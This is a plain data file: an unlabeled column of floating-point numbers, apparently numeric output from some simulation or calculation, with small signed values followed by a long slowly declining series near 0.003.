2.0399e-05
2.53329e-05
2.35414e-05
4.1209e-05
3.42367e-05
8.36482e-06
3.05508e-05
2.03838e-05
2.53523e-05
2.35544e-05
4.12486e-05
2.23656e-05
1.51711e-05
9.33748e-06
2.99947e-05
1.0894e-05
2.2344e-05
1.51593e-05
9.42771e-06
2.99858e-05
1.08802e-05
2.23513e-05
1.51659e-05
9.30083e-06
3.00097e-05
1.08605e-05
2.23567e-05
1.51721e-05
9.28578e-06
3.00194e-05
1.08706e-05
3.42697e-05
8.38467e-06
3.05931e-05
2.04342e-05
2.53496e-05
2.35476e-05
4.12945e-05
2.23359e-05
1.51645e-05
9.27486e-06
3.00367e-05
1.0854e-05
2.2258e-05
1.51614e-05
9.2484e-06
3.00148e-05
1.08262e-05
3.42594e-05
8.39494e-06
3.05589e-05
2.04102e-05
2.53843e-05
2.3616e-05
4.12856e-05
3.41941e-05
8.34359e-06
3.04748e-05
2.03527e-05
2.52703e-05
2.34895e-05
4.11509e-05
3.42066e-05
8.37176e-06
3.05171e-05
2.04206e-05
2.53448e-05
2.35523e-05
4.11972e-05
-2.63575e-06
-1.2163e-05
8.03688e-08
-4.46668e-06
-1.41361e-05
6.9893e-08
-1.00672e-06
-2.834e-06
-1.13195e-05
-4.13639e-06
7.46134e-09
-1.3382e-05
-8.88075e-07
-4.63362e-07
-2.61658e-06
-1.21606e-05
-4.4639e-06
7.52727e-08
-1.41241e-05
6.7638e-08
-9.96049e-07
-2.82523e-06
-1.13196e-05
-4.13441e-06
1.02399e-08
-1.33764e-05
-4.60444e-07
-8.8509e-07
-2.61955e-06
-1.21622e-05
7.11911e-08
-4.46366e-06
-1.41256e-05
6.39689e-08
-9.97669e-07
-2.8304e-06
-1.13126e-05
-4.13431e-06
9.06279e-09
-1.3374e-05
-8.88678e-07
-4.61843e-07
-2.63897e-06
-1.21579e-05
-4.46519e-06
7.85738e-08
-1.41295e-05
6.99534e-08
-1.00913e-06
-2.83954e-06
-1.13177e-05
-4.13447e-06
3.01913e-09
-1.33756e-05
-4.70427e-07
-8.91255e-07
-2.63286e-06
-1.21568e-05
7.61079e-08
-4.46649e-06
-1.4129e-05
6.4148e-08
-1.00715e-06
-2.8343e-06
-1.1323e-05
-4.13642e-06
1.03778e-09
-1.33774e-05
-8.89502e-07
-4.74645e-07
-2.64487e-06
-1.2163e-05
-4.468e-06
6.95524e-08
-1.41354e-05
5.82018e-08
-1.00925e-06
-2.8481e-06
-1.13214e-05
-4.13956e-06
5.50679e-09
-1.33834e-05
-4.67187e-07
-8.94757e-07
-2.63228e-06
-1.21582e-05
8.00528e-08
-4.46584e-06
-1.4131e-05
7.14628e-08
-1.00613e-06
-2.83205e-06
-1.13187e-05
-4.13514e-06
1.00013e-08
-1.33752e-05
-8.87441e-07
-4.65629e-07
-2.62557e-06
-1.21573e-05
-4.46591e-06
7.25726e-08
-1.41282e-05
6.49563e-08
-9.99901e-07
-2.82969e-06
-1.13219e-05
-4.13593e-06
1.25112e-08
-1.33779e-05
-4.63059e-07
-8.86407e-07
3.43227e-06
2.41745e-07
1.23791e-06
1.00174e-06
5.24999e-06
-1.07189e-06
-7.88668e-07
8.33149e-06
3.47254e-06
1.04993e-05
-5.72776e-07
-1.84596e-06
-3.28456e-06
-6.33164e-07
3.41357e-06
2.3724e-07
1.21805e-06
1.00387e-06
5.24776e-06
-1.06751e-06
-7.8971e-07
8.31908e-06
3.44497e-06
1.04866e-05
-5.73166e-07
-1.84927e-06
-3.28828e-06
-6.36873e-07
3.4231e-06
2.43691e-07
1.23893e-06
1.00605e-06
5.25081e-06
-1.06618e-06
-7.85976e-07
8.33346e-06
3.47574e-06
1.05025e-05
-5.70607e-07
-1.84452e-06
-3.28375e-06
-6.32079e-07
3.39683e-06
2.22369e-07
1.21474e-06
9.71486e-07
5.24657e-06
-1.07924e-06
-7.95784e-07
8.31935e-06
3.44349e-06
1.04897e-05
-5.7618e-07
-1.85098e-06
-3.2897e-06
-6.39601e-07
3.39528e-06
2.32436e-07
1.20811e-06
9.95157e-07
5.23085e-06
-1.07388e-06
-7.93888e-07
8.31016e-06
3.43941e-06
1.04752e-05
-5.76692e-07
-1.85176e-06
-3.291e-06
-6.40194e-07
3.38506e-06
2.32544e-07
1.20702e-06
9.94818e-07
5.22394e-06
-1.07081e-06
-7.92371e-07
8.30288e-06
3.43816e-06
1.04688e-05
-5.75486e-07
-1.85086e-06
-3.29183e-06
-6.38575e-07
3.39536e-06
2.3105e-07
1.20784e-06
9.90668e-07
5.22775e-06
-1.07877e-06
-7.9449e-07
8.31101e-06
3.43949e-06
1.04732e-05
-5.81786e-07
-1.8518e-06
-3.29528e-06
-6.40269e-07
3.3976e-06
2.32751e-07
1.21023e-06
9.95177e-07
5.23322e-06
-1.07286e-06
-7.92215e-07
8.31475e-06
3.44062e-06
1.04771e-05
-5.78017e-07
-1.84907e-06
-3.28911e-06
-6.38476e-07
2.68564e-05
2.948e-05
3.02566e-05
2.87102e-05
2.8618e-05
2.93836e-05
2.71165e-05
3.02638e-05
2.70041e-05
2.9537e-05
3.03472e-05
2.89125e-05
2.87662e-05
2.94784e-05
2.71967e-05
3.03628e-05
7.59643e-06
7.63495e-06
1.51269e-05
1.21326e-05
1.21554e-05
6.89119e-06
1.08619e-05
2.85987e-05
2.93916e-05
2.71488e-05
3.02979e-05
2.87158e-05
2.94336e-05
2.71512e-05
3.02856e-05
7.6202e-06
7.63478e-06
1.51081e-05
1.21621e-05
1.21465e-05
6.91682e-06
1.08933e-05
2.68073e-05
2.94629e-05
3.03097e-05
2.88159e-05
7.6271e-06
7.63165e-06
1.51307e-05
1.21594e-05
1.21674e-05
6.91363e-06
1.08929e-05
2.87131e-05
2.94514e-05
2.71668e-05
3.03644e-05
2.70093e-05
2.95135e-05
3.03222e-05
2.88622e-05
2.70692e-05
2.95676e-05
3.03535e-05
2.88817e-05
2.69012e-05
2.95134e-05
3.03216e-05
2.8838e-05
7.62743e-06
7.64744e-06
1.5113e-05
1.21429e-05
1.21506e-05
6.91769e-06
1.08789e-05
2.87346e-05
2.94372e-05
2.71632e-05
3.03531e-05
2.67968e-05
2.94763e-05
3.03234e-05
2.88294e-05
2.70243e-05
2.95448e-05
3.03309e-05
2.88278e-05
2.87441e-05
2.94596e-05
2.71584e-05
3.03146e-05
2.87421e-05
2.94646e-05
2.71695e-05
3.03528e-05
1.22468e-05
4.8335e-06
7.88314e-06
-6.76131e-07
-7.29776e-07
-1.79199e-06
-1.4775e-06
1.22424e-05
4.81367e-06
7.87387e-06
-6.77845e-07
-7.29855e-07
-1.79003e-06
-1.4795e-06
1.22457e-05
4.83563e-06
7.88895e-06
-6.77495e-07
-7.32344e-07
-1.7888e-06
-1.47666e-06
1.22423e-05
4.83173e-06
7.88619e-06
-6.79541e-07
-7.35275e-07
-1.79341e-06
-1.47838e-06
1.22411e-05
4.83098e-06
7.88125e-06
-6.78924e-07
-7.31568e-07
-1.79208e-06
-1.47879e-06
1.22339e-05
4.8284e-06
7.8748e-06
-6.7855e-07
-7.34152e-07
-1.79353e-06
-1.47837e-06
1.22392e-05
4.83166e-06
7.88284e-06
-6.79838e-07
-7.37078e-07
-1.79381e-06
-1.47857e-06
1.22437e-05
4.832e-06
7.88504e-06
-6.77222e-07
-7.31437e-07
-1.79211e-06
-1.47716e-06
9.14122e-06
4.09122e-06
7.95182e-06
3.62416e-06
6.80642e-06
1.03227e-05
4.29134e-06
1.64316e-05
4.42978e-05
2.79841e-05
2.33069e-05
1.06777e-05
3.32173e-05
3.32514e-05
5.65628e-05
1.82148e-05
3.0862e-05
2.70567e-05
3.41482e-05
4.02845e-05
4.06505e-05
9.15543e-06
4.09614e-06
3.63777e-06
7.97843e-06
6.82512e-06
4.2968e-06
1.03399e-05
1.6434e-05
4.44078e-05
2.33748e-05
2.79931e-05
1.06682e-05
3.33249e-05
3.32625e-05
5.53491e-07
8.83039e-06
7.61397e-06
5.38534e-06
3.35374e-06
3.9388e-06
4.92193e-06
5.65819e-05
1.82391e-05
3.08572e-05
2.70609e-05
3.414e-05
4.03147e-05
4.06945e-05
5.4977e-07
8.83547e-06
7.60897e-06
5.38987e-06
3.34941e-06
3.93546e-06
4.92642e-06
1.31724e-05
4.44065e-06
-3.17012e-06
-1.25949e-07
1.41851e-06
6.85901e-06
9.31495e-06
1.31762e-05
4.4454e-06
-3.16409e-06
-1.27933e-07
1.41533e-06
6.86867e-06
9.32473e-06
5.66098e-05
1.82404e-05
3.08427e-05
2.70518e-05
4.03299e-05
3.41119e-05
4.06946e-05
5.65912e-05
1.8237e-05
3.08164e-05
2.70465e-05
4.03203e-05
3.41158e-05
4.06942e-05
1.31861e-05
4.4464e-06
-1.26222e-07
-3.16331e-06
1.42748e-06
9.32622e-06
6.86918e-06
1.31867e-05
4.44552e-06
-1.25939e-07
-3.16277e-06
1.43087e-06
9.32762e-06
6.87107e-06
9.14882e-06
4.08761e-06
7.957e-06
3.62998e-06
1.03258e-05
6.81612e-06
4.29015e-06
1.64018e-05
2.79965e-05
4.43773e-05
2.33557e-05
1.06524e-05
3.32433e-05
3.32891e-05
5.45452e-07
8.82572e-06
5.36859e-06
7.60158e-06
4.91597e-06
3.9312e-06
3.34295e-06
5.39683e-07
8.82194e-06
5.36076e-06
7.60148e-06
4.92093e-06
3.3394e-06
3.92655e-06
1.31929e-05
4.44682e-06
-3.16331e-06
-1.2422e-07
6.87184e-06
1.43417e-06
9.32573e-06
1.31834e-05
4.45314e-06
-3.15959e-06
-1.09464e-07
6.87002e-06
1.42796e-06
9.33319e-06
5.66002e-05
1.82529e-05
2.70438e-05
3.0827e-05
4.07248e-05
3.41127e-05
4.03268e-05
5.43914e-07
8.8232e-06
5.3787e-06
7.61031e-06
4.9159e-06
3.92905e-06
3.3512e-06
9.1603e-06
4.0947e-06
7.98089e-06
3.6427e-06
1.03394e-05
6.84002e-06
4.29728e-06
1.64797e-05
2.80122e-05
4.43902e-05
2.33799e-05
1.07284e-05
3.32748e-05
3.33364e-05
5.4833e-07
8.81382e-06
5.35642e-06
7.59681e-06
4.92361e-06
3.33999e-06
3.93074e-06
9.152e-06
4.09906e-06
3.64471e-06
7.97538e-06
4.30035e-06
6.8289e-06
1.03367e-05
1.64459e-05
2.33986e-05
4.44457e-05
2.7996e-05
1.0678e-05
3.33725e-05
3.33015e-05
5.42271e-07
8.8187e-06
7.60305e-06
5.38058e-06
3.92523e-06
3.3451e-06
4.9126e-06
9.1538e-06
4.1008e-06
7.97148e-06
3.64177e-06
1.03352e-05
4.29881e-06
6.82534e-06
1.64608e-05
4.44094e-05
2.79935e-05
2.33529e-05
1.07055e-05
3.3268e-05
3.3326e-05
1.31924e-05
4.45949e-06
-3.15982e-06
-1.02935e-07
6.87379e-06
1.43605e-06
9.33927e-06
1.31879e-05
4.44702e-06
-3.16502e-06
-1.25665e-07
6.87212e-06
1.42384e-06
9.32174e-06
5.6592e-05
1.82516e-05
2.70559e-05
3.08448e-05
4.06932e-05
3.41466e-05
4.0326e-05
5.48548e-07
8.82036e-06
7.60678e-06
5.38287e-06
3.92995e-06
3.35191e-06
4.91736e-06
9.16524e-06
4.11634e-06
3.64596e-06
7.98594e-06
4.31137e-06
6.83155e-06
1.0349e-05
1.64623e-05
2.33434e-05
4.44059e-05
2.79752e-05
1.06933e-05
3.33112e-05
3.32691e-05
9.1648e-06
4.10772e-06
3.65067e-06
7.98525e-06
4.30731e-06
1.03465e-05
6.84064e-06
1.64301e-05
4.44088e-05
2.3403e-05
2.79633e-05
1.06719e-05
3.33558e-05
3.32674e-05
5.65828e-05
1.82455e-05
2.70336e-05
3.0811e-05
4.0702e-05
4.03204e-05
3.41149e-05
5.66041e-05
1.82648e-05
2.70349e-05
3.08042e-05
4.07224e-05
4.03424e-05
3.41039e-05
7.29134e-06
1.09781e-05
6.34175e-06
5.46011e-06
9.0497e-06
9.56919e-06
4.12015e-06
7.29e-06
6.33819e-06
1.09773e-05
5.46121e-06
9.04681e-06
4.11712e-06
9.57667e-06
7.29169e-06
1.09861e-05
6.34077e-06
5.45838e-06
4.11584e-06
9.04977e-06
9.57733e-06
7.29548e-06
1.09879e-05
6.34588e-06
5.46695e-06
9.05123e-06
9.58133e-06
4.12473e-06
7.29028e-06
1.0983e-05
6.33925e-06
5.45869e-06
4.1147e-06
9.04675e-06
9.57845e-06
7.28998e-06
6.33718e-06
1.09815e-05
5.45787e-06
9.0456e-06
4.11418e-06
9.57423e-06
7.28296e-06
6.33115e-06
1.09744e-05
5.44938e-06
9.56405e-06
9.03927e-06
4.10856e-06
7.28387e-06
6.33203e-06
1.09734e-05
5.45224e-06
9.56751e-06
9.03885e-06
4.1097e-06
0.00356822
0.00356806
0.00356807
0.00357088
0.00351466
0.0035148
0.00351479
0.00351701
0.00346339
0.00346343
0.00346342
0.00346573
0.00341148
0.00341144
0.00341144
0.00341372
0.0033604
0.00336035
0.00336035
0.00336258
0.00331069
0.00331064
0.00331064
0.00331284
0.00326241
0.00326238
0.00326238
0.00326454
0.00321543
0.00321541
0.00321541
0.00321753
0.00316953
0.00316953
0.00316953
0.00317162
0.00312453
0.00312454
0.00312454
0.0031266
0.00308026
0.00308027
0.00308027
0.00308231
0.00303658
0.00303659
0.00303659
0.00303861
0.00299341
0.00299342
0.00299342
0.00299541
0.0029507
0.00295071
0.00295071
0.00295269
0.00290843
0.00290844
0.00290844
0.0029104
0.00286656
0.00286657
0.00286657
0.00286852
0.00282507
0.00282508
0.00282508
0.00282701
0.00278394
0.00278394
0.00278394
0.00278586
0.00274313
0.00274314
0.00274314
0.00274504
0.00270264
0.00270265
0.00270265
0.00270454
0.00266244
0.00266244
0.00266244
0.00266432
0.0035816
0.00358178
0.00358177
0.0035816
0.00358178
0.00358179
0.00358251
0.00358251
0.00358251
0.00358251
0.00358177
0.00358178
0.00358161
0.00358179
0.00358178
0.0035816
0.00357088
0.00352469
0.00356806
0.00356806
0.00352719
0.00352719
0.00357088
0.00352468
0.00356807
0.00356807
0.00352719
0.00352719
0.00356807
0.00352719
0.00352719
0.00357088
0.00352469
0.00356806
0.00352719
0.00352719
0.00352469
0.00351701
0.00347376
0.0035148
0.0035148
0.00347642
0.00347642
0.00351701
0.00347376
0.0035148
0.0035148
0.00347642
0.00347642
0.0035148
0.00347642
0.00347642
0.00351701
0.00347376
0.00351479
0.00347642
0.00347642
0.00347376
0.00346573
0.00342171
0.00346343
0.00346343
0.00342439
0.00342439
0.00346573
0.00342171
0.00346343
0.00346343
0.00342439
0.00342439
0.00346343
0.00342439
0.00342439
0.00346573
0.00342171
0.00346343
0.00342439
0.00342439
0.00342172
0.00341372
0.00337039
0.00341144
0.00341144
0.003373
0.003373
0.00341372
0.00337039
0.00341144
0.00341144
0.003373
0.003373
0.00341144
0.003373
0.003373
0.00341372
0.00337039
0.00341144
0.003373
0.003373
0.00337039
0.00336258
0.00332042
0.00336035
0.00336035
0.00332293
0.00332293
0.00336258
0.00332042
0.00336035
0.00336035
0.00332293
0.00332293
0.00336035
0.00332293
0.00332293
0.00336258
0.00332042
0.00336035
0.00332293
0.00332293
0.00332042
0.00331284
0.0032719
0.00331064
0.00331064
0.00327432
0.00327432
0.00331284
0.0032719
0.00331064
0.00331064
0.00327432
0.00327432
0.00331064
0.00327432
0.00327432
0.00331284
0.0032719
0.00331064
0.00327432
0.00327432
0.0032719
0.00326454
0.00322471
0.00326238
0.00326238
0.00322704
0.00322704
0.00326454
0.00322471
0.00326238
0.00326238
0.00322704
0.00322704
0.00326238
0.00322704
0.00322704
0.00326454
0.00322471
0.00326238
0.00322704
0.00322704
0.00322471
0.00321753
0.00317865
0.00321541
0.00321541
0.00318091
0.00318091
0.00321753
0.00317865
0.00321541
0.00321541
0.00318091
0.00318091
0.00321541
0.00318091
0.00318091
0.00321753
0.00317865
0.00321541
0.00318091
0.00318091
0.00317865
0.00317162
0.00313351
0.00316953
0.00316953
0.00313571
0.00313571
0.00317162
0.00313351
0.00316953
0.00316953
0.00313571
0.00313571
0.00316953
0.00313571
0.00313571
0.00317162
0.00313351
0.00316953
0.00313571
0.00313571
0.00313351
0.00312661
0.00308912
0.00312454
0.00312454
0.00309127
0.00309127
0.00312661
0.00308912
0.00312454
0.00312454
0.00309127
0.00309127
0.00312454
0.00309127
0.00309127
0.00312661
0.00308912
0.00312454
0.00309127
0.00309127
0.00308912
0.00308231
0.00304534
0.00308026
0.00308026
0.00304745
0.00304746
0.00308231
0.00304533
0.00308026
0.00308026
0.00304746
0.00304746
0.00308026
0.00304746
0.00304746
0.00308231
0.00304534
0.00308026
0.00304746
0.00304746
0.00304533
0.00303861
0.00300207
0.00303659
0.00303659
0.00300416
0.00300416
0.00303861
0.00300207
0.00303659
0.00303659
0.00300417
0.00300417
0.00303659
0.00300417
0.00300417
0.00303861
0.00300207
0.00303659
0.00300417
0.00300417
0.00300207
0.00299541
0.00295928
0.00299342
0.00299342
0.00296135
0.00296135
0.00299541
0.00295928
0.00299342
0.00299342
0.00296135
0.00296135
0.00299342
0.00296135
0.00296135
0.00299542
0.00295928
0.00299342
0.00296135
0.00296135
0.00295928
0.00295269
0.00291694
0.00295071
0.00295071
0.00291897
0.00291897
0.00295269
0.00291694
0.00295071
0.00295071
0.00291897
0.00291897
0.00295071
0.00291897
0.00291897
0.00295269
0.00291694
0.00295071
0.00291897
0.00291897
0.00291694
0.0029104
0.00287502
0.00290844
0.00290844
0.002877
0.002877
0.0029104
0.00287501
0.00290844
0.00290844
0.002877
0.002877
0.00290844
0.002877
0.002877
0.0029104
0.00287501
0.00290844
0.002877
0.002877
0.00287501
0.00286852
0.00283347
0.00286657
0.00286657
0.00283542
0.00283542
0.00286852
0.00283347
0.00286657
0.00286657
0.00283542
0.00283542
0.00286657
0.00283542
0.00283542
0.00286852
0.00283347
0.00286657
0.00283542
0.00283542
0.00283347
0.00282701
0.00279228
0.00282508
0.00282508
0.0027942
0.0027942
0.00282701
0.00279228
0.00282508
0.00282508
0.00279419
0.0027942
0.00282508
0.0027942
0.0027942
0.00282701
0.00279228
0.00282508
0.0027942
0.0027942
0.00279228
0.00278586
0.00275143
0.00278394
0.00278394
0.00275331
0.00275331
0.00278586
0.00275143
0.00278394
0.00278394
0.00275331
0.00275331
0.00278394
0.00275331
0.00275331
0.00278586
0.00275143
0.00278394
0.00275331
0.00275331
0.00275143
0.00274504
0.00271089
0.00274314
0.00274314
0.00271274
0.00271274
0.00274504
0.00271088
0.00274314
0.00274314
0.00271274
0.00271274
0.00274314
0.00271274
0.00271274
0.00274504
0.00271089
0.00274314
0.00271274
0.00271274
0.00271089
0.00270454
0.00267064
0.00270265
0.00270264
0.00267247
0.00267247
0.00270453
0.00267064
0.00270265
0.00270265
0.00267247
0.00267247
0.00270265
0.00267247
0.00267247
0.00270453
0.00267064
0.00270265
0.00267247
0.00267247
0.00267064
0.00266432
0.00266244
0.00266244
0.00266432
0.00266244
0.00266244
0.00266244
0.00266432
0.00266244
0.00359073
0.0036007
0.00359531
0.00359531
0.00361771
0.0036047
0.00363325
0.0035986
0.00361775
0.00360469
0.00359861
0.00363319
0.00360919
0.00363726
0.00363735
0.00354972
0.00354982
0.00356812
0.00354805
0.0035277
0.00354702
0.00354973
0.00354973
0.00356812
0.00354806
0.00356822
0.00356823
0.00356823
0.00352708
0.00352707
0.00352707
0.00352707
0.00354841
0.00356515
0.0035683
0.00355258
0.0035705
0.00354938
0.00355321
0.00352786
0.00354704
0.0035484
0.0035683
0.00356514
0.00355258
0.00357049
0.00355321
0.00354937
0.00356191
0.00356184
0.00354944
0.00354972
0.00354972
0.00350002
0.0035179
0.00351891
0.00349912
0.00351727
0.00349865
0.00350002
0.00351789
0.00351891
0.00349912
0.00351466
0.00351466
0.00351466
0.00347636
0.00347636
0.00347636
0.00347636
0.00349912
0.00351839
0.00351473
0.00350217
0.00351768
0.00349959
0.00350211
0.00351728
0.00349865
0.00349912
0.00351473
0.00351838
0.00350217
0.00351767
0.00350211
0.00349959
0.00351866
0.00351866
0.00349954
0.00349972
0.00349972
0.00344776
0.00346636
0.0034672
0.00344698
0.00346606
0.00344675
0.00344776
0.00346636
0.0034672
0.00344698
0.00346339
0.00346339
0.00346339
0.00342442
0.00342442
0.00342442
0.00342442
0.00344724
0.00346673
0.0034634
0.00345041
0.00346644
0.00344741
0.00345039
0.00346606
0.00344675
0.00344724
0.0034634
0.00346673
0.0034504
0.00346644
0.00345039
0.00344741
0.00346681
0.0034668
0.00344772
0.00344736
0.00344736
0.00339564
0.00341413
0.00341482
0.00339503
0.00341397
0.00339488
0.00339564
0.00341413
0.00341482
0.00339503
0.00341148
0.00341148
0.00341148
0.00337305
0.00337305
0.00337305
0.00337305
0.00339537
0.00341444
0.00341145
0.00339855
0.00341434
0.00339541
0.00339856
0.00341397
0.00339488
0.00339537
0.00341145
0.00341444
0.00339855
0.00341434
0.00339856
0.00339541
0.00341444
0.00341444
0.0033959
0.00339529
0.00339529
0.00334477
0.00336291
0.00336341
0.00334433
0.00336279
0.00334419
0.00334477
0.00336291
0.00336341
0.00334433
0.0033604
0.0033604
0.0033604
0.00332298
0.00332298
0.00332298
0.00332298
0.00334465
0.00336315
0.00336036
0.00334779
0.00336311
0.00334466
0.00334779
0.00336279
0.0033442
0.00334465
0.00336036
0.00336315
0.00334778
0.00336311
0.00334779
0.00334466
0.00336313
0.00336313
0.00334522
0.00334453
0.00334453
0.00329542
0.00331313
0.00331348
0.00329511
0.00331305
0.00329498
0.00329542
0.00331313
0.00331348
0.00329511
0.00331069
0.00331069
0.00331069
0.00327435
0.00327435
0.00327435
0.00327435
0.00329541
0.00331331
0.00331064
0.00329845
0.0033133
0.0032954
0.00329844
0.00331303
0.00329499
0.0032954
0.00331064
0.00331331
0.00329845
0.0033133
0.00329844
0.0032954
0.00331332
0.00331332
0.00329598
0.00329529
0.00329529
0.00324752
0.00326481
0.00326506
0.0032473
0.00326473
0.0032472
0.00324752
0.00326481
0.00326506
0.0032473
0.00326241
0.00326241
0.00326241
0.00322706
0.00322706
0.00322706
0.00322706
0.00324758
0.00326495
0.00326237
0.00325052
0.00326494
0.00324757
0.00325051
0.00326473
0.0032472
0.00324758
0.00326237
0.00326495
0.00325052
0.00326494
0.00325051
0.00324757
0.00326498
0.00326498
0.00324815
0.00324746
0.00324746
0.0032009
0.0032178
0.00321798
0.00320073
0.00321773
0.00320063
0.0032009
0.0032178
0.00321798
0.00320073
0.00321543
0.00321543
0.00321543
0.00318092
0.00318092
0.00318092
0.00318092
0.00320099
0.00321792
0.00321539
0.00320384
0.00321791
0.00320099
0.00320383
0.00321772
0.00320063
0.00320099
0.00321539
0.00321792
0.00320384
0.00321791
0.00320383
0.00320099
0.00321795
0.00321795
0.00320155
0.00320088
0.00320088
0.00315531
0.00317189
0.00317203
0.00315518
0.00317182
0.00315508
0.00315531
0.00317189
0.00317203
0.00315518
0.00316953
0.00316953
0.00316953
0.00313571
0.00313571
0.00313571
0.00313571
0.00315544
0.00317199
0.00316951
0.0031582
0.00317198
0.00315543
0.00315818
0.00317182
0.00315508
0.00315544
0.00316951
0.00317199
0.0031582
0.00317198
0.00315818
0.00315543
0.00317203
0.00317203
0.00315597
0.00315531
0.00315531
0.00311057
0.00312688
0.00312699
0.00311045
0.00312681
0.00311036
0.00311057
0.00312688
0.00312699
0.00311045
0.00312453
0.00312453
0.00312453
0.00309127
0.00309127
0.00309127
0.00309127
0.00311072
0.00312696
0.00312451
0.00311341
0.00312695
0.0031107
0.00311338
0.00312681
0.00311036
0.00311072
0.00312451
0.00312696
0.00311341
0.00312695
0.00311338
0.0031107
0.003127
0.003127
0.00311123
0.00311057
0.00311057
0.0030665
0.00308258
0.00308268
0.00306639
0.00308252
0.0030663
0.0030665
0.00308259
0.00308268
0.00306639
0.00308026
0.00308026
0.00308026
0.00304745
0.00304745
0.00304745
0.00304745
0.00306667
0.00308266
0.00308024
0.00306929
0.00308265
0.00306664
0.00306927
0.00308252
0.0030663
0.00306667
0.00308024
0.00308266
0.00306929
0.00308265
0.00306927
0.00306664
0.0030827
0.0030827
0.00306716
0.0030665
0.0030665
0.003023
0.00303888
0.00303898
0.00302288
0.00303882
0.00302279
0.003023
0.00303888
0.00303898
0.00302288
0.00303658
0.00303658
0.00303658
0.00300415
0.00300415
0.00300415
0.00300415
0.00302319
0.00303895
0.00303657
0.00302575
0.00303896
0.00302314
0.00302573
0.00303882
0.0030228
0.00302319
0.00303657
0.00303895
0.00302575
0.00303896
0.00302573
0.00302314
0.00303898
0.00303898
0.00302364
0.00302299
0.00302299
0.00297999
0.00299569
0.00299579
0.00297987
0.00299564
0.00297979
0.00297999
0.00299569
0.00299579
0.00297987
0.00299341
0.00299341
0.00299341
0.00296134
0.00296134
0.00296134
0.00296134
0.0029802
0.00299575
0.0029934
0.0029827
0.00299578
0.00298012
0.00298269
0.00299564
0.00297979
0.0029802
0.0029934
0.00299575
0.0029827
0.00299578
0.00298269
0.00298012
0.00299578
0.00299579
0.00298061
0.00297996
0.00297996
0.00293743
0.00295297
0.00295307
0.0029373
0.00295292
0.00293723
0.00293743
0.00295297
0.00295307
0.0029373
0.0029507
0.0029507
0.0029507
0.00291896
0.00291896
0.00291896
0.00291896
0.00293766
0.00295302
0.0029507
0.00294011
0.00295306
0.00293756
0.0029401
0.00295292
0.00293723
0.00293766
0.0029507
0.00295302
0.00294011
0.00295306
0.0029401
0.00293756
0.00295305
0.00295305
0.00293806
0.00293739
0.00293739
0.00289529
0.00291067
0.00291078
0.00289516
0.00291063
0.0028951
0.00289529
0.00291067
0.00291078
0.00289516
0.00290843
0.00290843
0.00290843
0.00287699
0.00287699
0.00287699
0.00287699
0.00289554
0.00291071
0.00290843
0.00289794
0.00291077
0.00289541
0.00289793
0.00291063
0.00289509
0.00289554
0.00290843
0.00291071
0.00289794
0.00291077
0.00289793
0.00289541
0.00291074
0.00291074
0.00289593
0.00289524
0.00289524
0.00285354
0.00286878
0.00286889
0.00285341
0.00286874
0.00285335
0.00285354
0.00286878
0.00286889
0.00285341
0.00286656
0.00286656
0.00286656
0.00283541
0.00283541
0.00283541
0.00283541
0.00285381
0.00286882
0.00286657
0.00285616
0.00286889
0.00285366
0.00285616
0.00286874
0.00285335
0.00285381
0.00286657
0.00286882
0.00285616
0.00286889
0.00285616
0.00285366
0.00286884
0.00286885
0.00285419
0.00285348
0.00285348
0.00281217
0.00282728
0.00282738
0.00281204
0.00282724
0.00281198
0.00281217
0.00282728
0.00282738
0.00281204
0.00282507
0.00282507
0.00282507
0.00279419
0.00279419
0.00279419
0.00279419
0.00281245
0.0028273
0.00282508
0.00281476
0.00282738
0.00281228
0.00281476
0.00282724
0.00281198
0.00281245
0.00282508
0.0028273
0.00281476
0.00282738
0.00281476
0.00281228
0.00282733
0.00282733
0.00281283
0.0028121
0.0028121
0.00277115
0.00278614
0.00278624
0.00277102
0.0027861
0.00277097
0.00277115
0.00278614
0.00278624
0.00277102
0.00278394
0.00278394
0.00278394
0.0027533
0.0027533
0.0027533
0.0027533
0.00277144
0.00278615
0.00278394
0.00277371
0.00278624
0.00277125
0.00277371
0.0027861
0.00277097
0.00277144
0.00278394
0.00278615
0.00277371
0.00278624
0.00277371
0.00277125
0.00278618
0.00278618
0.00277181
0.00277107
0.00277107
0.00273045
0.00274534
0.00274542
0.00273032
0.00274529
0.00273028
0.00273045
0.00274533
0.00274542
0.00273033
0.00274313
0.00274313
0.00274313
0.00271274
0.00271274
0.00271274
0.00271274
0.00273074
0.00274534
0.00274314
0.00273299
0.00274542
0.00273055
0.00273299
0.0027453
0.00273028
0.00273074
0.00274314
0.00274534
0.00273299
0.00274542
0.00273299
0.00273055
0.00274537
0.00274537
0.00273112
0.00273037
0.00273037
0.00269005
0.00270483
0.00270492
0.00268993
0.0027048
0.00268991
0.00269005
0.00270483
0.00270492
0.00268993
0.00270264
0.00270264
0.00270264
0.00267246
0.00267246
0.00267246
0.00267246
0.00269035
0.00270483
0.00270265
0.00269257
0.00270491
0.00269015
0.00269257
0.0027048
0.00268989
0.00269035
0.00270265
0.00270483
0.00269257
0.00270491
0.00269257
0.00269015
0.00270486
0.00270486
0.00269073
0.00268997
0.00268997
0.00264993
0.00266462
0.0026647
0.00264981
0.00266458
0.00264978
0.00266462
0.0026647
0.00264982
0.00266244
0.00266244
0.00266244
0.00265022
0.00266461
0.00266244
0.00265243
0.00266469
0.00265002
0.00265243
0.00266459
0.00265023
0.00266244
0.00266461
0.00266469
0.00265243
0.00266465
0.00266465
0.00265061
0.00264986
0.00264986
0.00360918
0.00363732
0.00363719
0.0035917
0.00363725
0.00359164
0.00363704
0.00360585
0.00359003
0.00359012
0.00363153
0.00363133
0.00361773
0.00360469
0.00363323
0.0035986
0.00361772
0.00360469
0.00363314
0.0035986
0.00362145
0.00358542
0.00363387
0.00358318
0.00362144
0.00358548
0.00363355
0.0035832
0.00361314
0.00360186
0.00358499
0.00358382
0.00362782
0.0035967
0.00358336
0.00361313
0.00360186
0.00358495
0.00358382
0.00362765
0.0035967
0.00358337
0.00360919
0.00363721
0.00363734
0.00359174
0.00363707
0.00360585
0.00359004
0.00359004
0.00363139
0.00363155
0.00359183
0.00363728
0.00361772
0.00360468
0.00363314
0.00359859
0.00361772
0.00360469
0.00359859
0.00363317
0.00362145
0.00358551
0.00363354
0.00358322
0.00361312
0.00360185
0.003585
0.00358383
0.00362762
0.0035967
0.00358339
0.00362144
0.00358554
0.00363358
0.00358321
0.00361312
0.00360186
0.00358383
0.00358498
0.0035967
0.00362768
0.00358338
0.00359073
0.0036007
0.00359531
0.00359531
0.00359073
0.0036007
0.00359531
0.00359532
0.00359073
0.0036007
0.00359531
0.00359532
0.00358942
0.00359833
0.00358089
0.00358089
0.00359365
0.00359365
0.00357926
0.00358942
